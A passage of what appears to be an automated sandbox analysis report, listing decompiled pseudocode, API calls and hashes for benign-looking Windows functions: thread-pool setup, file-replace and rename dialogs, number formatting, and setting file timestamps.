                                            0x00000000
                                            0x00c3b23e
                                            0x00000000

                                            APIs
                                            • _swprintf.LIBCMT ref: 00C3B1DE
                                              • Part of subcall function 00C33E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C33E54
                                            • _wcschr.LIBVCRUNTIME ref: 00C3B1FC
                                            • _wcschr.LIBVCRUNTIME ref: 00C3B20C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                            • String ID: %c:\
                                            • API String ID: 525462905-3142399695
                                            • Opcode ID: 7ba36d55f80c2f153c31961de2484bd162d7b4a0e9e9803b36e2c4abb114f3a6
                                            • Instruction ID: 0f81e96d7d3d4caaa79dc956efff8fb14075e9ac9fc55fe71d7fe53b7418cb35
                                            • Opcode Fuzzy Hash: 7ba36d55f80c2f153c31961de2484bd162d7b4a0e9e9803b36e2c4abb114f3a6
                                            • Instruction Fuzzy Hash: 940145234103117ACA346B359C82C2FB7ACDE96760F50850AFD58C2082FB31DD84D2F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C40326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E00C40326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xc700e0);
					E00C36CC9(E00C36CCE(_t19), 0xc700e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                                            0x00c40326
                                            0x00c40326
                                            0x00c4032e
                                            0x00c40332
                                            0x00c40333
                                            0x00c40337
                                            0x00c40339
                                            0x00c40339
                                            0x00c40342
                                            0x00c40344
                                            0x00c40344
                                            0x00c40346
                                            0x00c4034e
                                            0x00c40350
                                            0x00c40350
                                            0x00c40352
                                            0x00c40358
                                            0x00c4035f
                                            0x00c40373
                                            0x00c40379
                                            0x00c4037f
                                            0x00c4038b
                                            0x00c40391
                                            0x00c4039b
                                            0x00c403a7
                                            0x00c403a7
                                            0x00c403ad
                                            0x00c403b5
                                            0x00c403bb
                                            0x00c403c4

                                            APIs
                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C3A865,00000008,00000000,?,?,00C3C802,?,00000000,?,00000001,?), ref: 00C4035F
                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C3A865,00000008,00000000,?,?,00C3C802,?,00000000), ref: 00C40369
                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C3A865,00000008,00000000,?,?,00C3C802,?,00000000), ref: 00C40379
                                            Strings
                                            • Thread pool initialization failed., xrefs: 00C40391
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                            • String ID: Thread pool initialization failed.
                                            • API String ID: 3340455307-2182114853
                                            • Opcode ID: b49389aa8b2cde3f331475e6a9bd3c0f21482c623d1efe5e0c55ac53f5114993
                                            • Instruction ID: 95a8d7187cab21e431bfb4963aae077805d26d47cfda0482038f5890fa95d344
                                            • Opcode Fuzzy Hash: b49389aa8b2cde3f331475e6a9bd3c0f21482c623d1efe5e0c55ac53f5114993
                                            • Instruction Fuzzy Hash: 791173B1540704AFC3315F669CC4AABFBECFB55754F20482EF2DA82211D6B11981CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4C96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4C96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0xc8ce10 = _a12;
				 *0xc8ce14 = _a16;
				 *0xc775f4 = _a20;
				if( *0xc775d3 == 0) {
					if( *0xc775d2 == 0) {
						_t16 = E00C4AFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xc70064, _t25,  *0xc775c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xc70060, L"RENAMEDLG",  *0xc775d8, E00C4C2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}







                                            0x00c4c979
                                            0x00c4c982
                                            0x00c4c98b
                                            0x00c4c990
                                            0x00c4c99d
                                            0x00c4c9ae
                                            0x00c4c9b3
                                            0x00c4c9da
                                            0x00c4c9ee
                                            0x00c4c9f3
                                            0x00000000
                                            0x00000000
                                            0x00c4c9d8
                                            0x00000000
                                            0x00000000
                                            0x00c4c9d8
                                            0x00000000
                                            0x00c4c9fa
                                            0x00000000
                                            0x00c4c9a1
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                            • API String ID: 0-56093855
                                            • Opcode ID: 38b1d57bee9129304a81b137f0252107893d9000e5e31faed1b784e7c97675ec
                                            • Instruction ID: 1c2c9ce5553158c8c5a3d16d1023dbf85e4ef3c1310d38358b3b12df56683de0
                                            • Opcode Fuzzy Hash: 38b1d57bee9129304a81b137f0252107893d9000e5e31faed1b784e7c97675ec
                                            • Instruction Fuzzy Hash: 8201D472209209BFC7909B59EDC0F1BBBE9F755750F000536F456E2230D7729C509B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C58749, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00C58749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00C53356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00C4DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00C4DAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xc53fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00C4E920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00C4DAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00C4DE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00C4DE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00C4DE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00C58A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00C60FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00C57ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00C57DAB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                            0x00c58749
                                            0x00c58754
                                            0x00c5875b
                                            0x00c5875d
                                            0x00c5875d
                                            0x00c5875f
                                            0x00c58768
                                            0x00c5876a
                                            0x00c5876f
                                            0x00c58775
                                            0x00c5878b
                                            0x00c58790
                                            0x00c58793
                                            0x00c587a0
                                            0x00c587a5
                                            0x00c587f9
                                            0x00c58801
                                            0x00c58803
                                            0x00c58805
                                            0x00c58808
                                            0x00c58808
                                            0x00c58808
                                            0x00c5880e
                                            0x00c58816
                                            0x00c58829
                                            0x00c5882c
                                            0x00c5882e
                                            0x00c58831
                                            0x00c58832
                                            0x00c58853
                                            0x00c58856
                                            0x00c58856
                                            0x00c58834
                                            0x00c58834
                                            0x00c58836
                                            0x00c58841
                                            0x00c58841
                                            0x00c58843
                                            0x00c5884a
                                            0x00c58845
                                            0x00c58845
                                            0x00c58845
                                            0x00c58843
                                            0x00c58857
                                            0x00c58859
                                            0x00c5885a
                                            0x00c5885d
                                            0x00c5885f
                                            0x00c58873
                                            0x00c58861
                                            0x00c58861
                                            0x00c58861
                                            0x00c58878
                                            0x00c58878
                                            0x00c5887d
                                            0x00c58880
                                            0x00c5888b
                                            0x00c5888b
                                            0x00c5888b
                                            0x00c5888b
                                            0x00c5888f
                                            0x00c58896
                                            0x00c58897
                                            0x00c5889a
                                            0x00c5889d
                                            0x00c5889d
                                            0x00c5889f
                                            0x00000000
                                            0x00000000
                                            0x00c588b7
                                            0x00c588be
                                            0x00c588c2
                                            0x00c588c5
                                            0x00c588c8
                                            0x00c588ca
                                            0x00c588ca
                                            0x00c588ca
                                            0x00c588cc
                                            0x00c588cf
                                            0x00c588d2
                                            0x00c588d4
                                            0x00c588dc
                                            0x00c588e2
                                            0x00c588e5
                                            0x00c588e8
                                            0x00c588e9
                                            0x00c588ec
                                            0x00c588ef
                                            0x00c588ef
                                            0x00c588f4
                                            0x00c588f7
                                            0x00000000
                                            0x00000000
                                            0x00c5890f
                                            0x00c58914
                                            0x00c58918
                                            0x00000000
                                            0x00000000
                                            0x00c5891c
                                            0x00c5891c
                                            0x00c5891f
                                            0x00c58920
                                            0x00c58920
                                            0x00c58922
                                            0x00c58925
                                            0x00000000
                                            0x00000000
                                            0x00c58927
                                            0x00c5892a
                                            0x00c58931
                                            0x00c58934
                                            0x00c58937
                                            0x00c5894d
                                            0x00c5894d
                                            0x00c5894d
                                            0x00c58939
                                            0x00c58939
                                            0x00c5893b
                                            0x00c5893e
                                            0x00c58949
                                            0x00c58940
                                            0x00c58943
                                            0x00c58943
                                            0x00c5893e
                                            0x00000000
                                            0x00c58937
                                            0x00c5892c
                                            0x00c5892c
                                            0x00c5892e
                                            0x00c5892e
                                            0x00c58882
                                            0x00c58882
                                            0x00c58885
                                            0x00c58950
                                            0x00c58950
                                            0x00c58952
                                            0x00c58954
                                            0x00c58957
                                            0x00c58958
                                            0x00c58959
                                            0x00c5895a
                                            0x00c58962
                                            0x00c58962
                                            0x00c58962
                                            0x00c58964
                                            0x00c58967
                                            0x00c5896a
                                            0x00c5896c
                                            0x00c5896c
                                            0x00c5896e
                                            0x00c58980
                                            0x00c58984
                                            0x00c58987
                                            0x00c5898e
                                            0x00c58996
                                            0x00c58996
                                            0x00c58999
                                            0x00c5899b
                                            0x00c589ac
                                            0x00c589ac
                                            0x00c589b0
                                            0x00c589b0
                                            0x00c589b3
                                            0x00c589b5
                                            0x00c589b8
                                            0x00000000
                                            0x00c5899d
                                            0x00c5899d
                                            0x00c589a3
                                            0x00c589a3
                                            0x00c589a7
                                            0x00c589ba
                                            0x00c589ba
                                            0x00c589be
                                            0x00c589bf
                                            0x00c589c1
                                            0x00c589c3
                                            0x00c58a04
                                            0x00c58a04
                                            0x00c58a06
                                            0x00c58a13
                                            0x00c58a13
                                            0x00c58a15
                                            0x00c58a17
                                            0x00c58a18
                                            0x00c58a19
                                            0x00c58a20
                                            0x00c58a23
                                            0x00c58a25
                                            0x00c58a25
                                            0x00c58a26
                                            0x00c58a28
                                            0x00c58a2b
                                            0x00c58a2b
                                            0x00c58a2d
                                            0x00c58a2f
                                            0x00000000
                                            0x00c58a2f
                                            0x00c58a08
                                            0x00c58a0a
                                            0x00000000
                                            0x00000000
                                            0x00c58a0c
                                            0x00000000
                                            0x00000000
                                            0x00c58a0e
                                            0x00c58a11
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c58a11
                                            0x00c589ca
                                            0x00c589d0
                                            0x00c589d0
                                            0x00c589d2
                                            0x00c589d3
                                            0x00c589d4
                                            0x00c589d5
                                            0x00c589dc
                                            0x00c589df
                                            0x00c589e1
                                            0x00c589e2
                                            0x00c589e4
                                            0x00c589f1
                                            0x00c589f1
                                            0x00c589f3
                                            0x00c589f5
                                            0x00c589f6
                                            0x00c589f7
                                            0x00c589fe
                                            0x00c58a01
                                            0x00c58a03
                                            0x00c58a03
                                            0x00000000
                                            0x00c58a03
                                            0x00c589e6
                                            0x00c589e6
                                            0x00c589e8
                                            0x00000000
                                            0x00000000
                                            0x00c589ea
                                            0x00000000
                                            0x00000000
                                            0x00c589ec
                                            0x00c589ef
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c589ef
                                            0x00c589cc
                                            0x00c589ce
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c589ce
                                            0x00c5899f
                                            0x00c589a1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c589a1
                                            0x00c5899b
                                            0x00000000
                                            0x00c58885
                                            0x00c58880
                                            0x00c587a7
                                            0x00c587a9
                                            0x00000000
                                            0x00c587ab
                                            0x00c587c1
                                            0x00c587c6
                                            0x00c587c8
                                            0x00c587d4
                                            0x00c587da
                                            0x00c587db
                                            0x00c587dd
                                            0x00c587df
                                            0x00c587ea
                                            0x00c587ea
                                            0x00c587ed
                                            0x00c587ef
                                            0x00c587ef
                                            0x00c587f2
                                            0x00c587ca
                                            0x00c587ca
                                            0x00c587ca
                                            0x00000000
                                            0x00c587c8
                                            0x00c58777
                                            0x00c58777
                                            0x00c5877e
                                            0x00c5877f
                                            0x00c58781
                                            0x00c58a33
                                            0x00c58a37
                                            0x00c58a3c
                                            0x00c58a3c
                                            0x00c58a4b
                                            0x00c58a4b

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __alldvrm$_strrchr
                                            • String ID:
                                            • API String ID: 1036877536-0
                                            • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                            • Instruction ID: aafa00cbc08ab74ac344d5857c8520ee98fb80f3778a9a6536a466acdf3503b6
                                            • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                            • Instruction Fuzzy Hash: EEA15A39A043869FDB21CE18C8417BEBBE1EF55351F18416DEC95AB282CA348A8DC759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39F96, Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00C39F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00C4D940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00C39E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00C3A12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00C4082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00C4082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00C4082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00C3A12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00C3B32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                                            0x00c39f96
                                            0x00c39f9b
                                            0x00c39fa7
                                            0x00c39fae
                                            0x00c39fb2
                                            0x00c39fbf
                                            0x00c39fbf
                                            0x00c39fc3
                                            0x00c39fc3
                                            0x00c39fcc
                                            0x00c39fd9
                                            0x00c39fd9
                                            0x00c39fdd
                                            0x00c39fdd
                                            0x00c39fe6
                                            0x00c39ff4
                                            0x00c39ff4
                                            0x00c39ff8
                                            0x00c39fff
                                            0x00c3a004
                                            0x00c3a00b
                                            0x00c3a021
                                            0x00c3a011
                                            0x00c3a01a
                                            0x00c3a01a
                                            0x00c3a03c
                                            0x00c3a042
                                            0x00c3a049
                                            0x00c3a093
                                            0x00c3a098
                                            0x00c3a0a1
                                            0x00c3a0a1
                                            0x00c3a0ab
                                            0x00c3a0b4
                                            0x00c3a0b4
                                            0x00c3a0be
                                            0x00c3a0c7
                                            0x00c3a0c7
                                            0x00c3a0d7
                                            0x00c3a0db
                                            0x00c3a0eb
                                            0x00c3a0fb
                                            0x00c3a101
                                            0x00c3a108
                                            0x00c3a110
                                            0x00c3a11d
                                            0x00c3a11d
                                            0x00000000
                                            0x00c3a04b
                                            0x00c3a05c
                                            0x00c3a063
                                            0x00c3a122
                                            0x00c3a12c
                                            0x00c3a12c
                                            0x00c3a080
                                            0x00c3a086
                                            0x00c3a08d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c3a08d
                                            0x00c3a049
                                            0x00c39fee
                                            0x00c39ff2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39ff2
                                            0x00c39fd3
                                            0x00c39fd7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c39fd7
                                            0x00c39fb9
                                            0x00c39fbd
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00C37F2C,?,?,?), ref: 00C3A03C
                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00C37F2C,?,?), ref: 00C3A080
                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00C37F2C,?,?,?,?,?,?,?,?), ref: 00C3A101
                                            • CloseHandle.KERNEL32(?,?,00000000,?,00C37F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 00C3A108
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
